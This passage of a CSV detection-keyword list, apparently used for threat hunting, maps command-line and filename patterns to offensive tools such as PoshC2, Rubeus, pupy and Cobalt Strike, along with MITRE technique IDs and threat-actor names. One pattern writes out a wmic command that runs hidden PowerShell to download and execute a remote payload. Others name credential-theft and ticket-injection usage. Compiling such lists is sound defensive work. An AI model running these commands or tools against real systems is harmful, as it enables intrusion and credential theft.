*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* pptp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* preauthscan /users:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* prepare.sh shell/mod_*.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"* --preset all -o syscalls_all*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" +"* --preset common -o syscalls_common*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" +"* PrincipalsAllowedToDelegateToAccount *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* Priv_Esc.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"* --priv-esc*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* process call create *cmd.exe /c powershell.exe -nop -w hidden -c *IEX ((new-object net.webclient).downloadstring('https://*","greyware_tool_keyword","wmic","Threat Actors ran the following command to download and execute a PowerShell payload","T1059.001 - T1059.003 - T1569.002 - T1021.006","TA0002 - TA0005","N/A","N/A","Collection","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* Process spawned with stolen token!*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"* --propagated*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* proxychains *","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"* ps /target:*.xml /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* ptt /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* ptunnel-ng*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"* --publickey * --ecmdigits 25 --verbose --private*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --publickey * --uncipherfile ./ciphered\_file*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* puppet-naivesigning.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* PupyCredentials*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* pupylib.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupySocketStream*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyTCPClient*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyTCPServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyWebServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyWebSocketClient*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyWebSocketServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* pupyx64.lin*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* push_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* putterpanda.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"* Pwn3d!*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* py2exe*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"* pyasn1 *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"* pyasn1.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"* pyLAPS.py*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","0","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" +"* pypykatz*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"* pywsus.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -q -r karma.rc_.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"* qconn-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* qscan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* quake1-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* quake3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* quake3-master-getservers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -r data/* -p * -m readfiles*portscan*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"* radare *:* -ble*","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","4","338","50","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" +"* rai-attack-dns*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"* rai-attack-http*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"* --random_user_agent*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"* --random-agent *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* rarce.py*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"* rasman.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 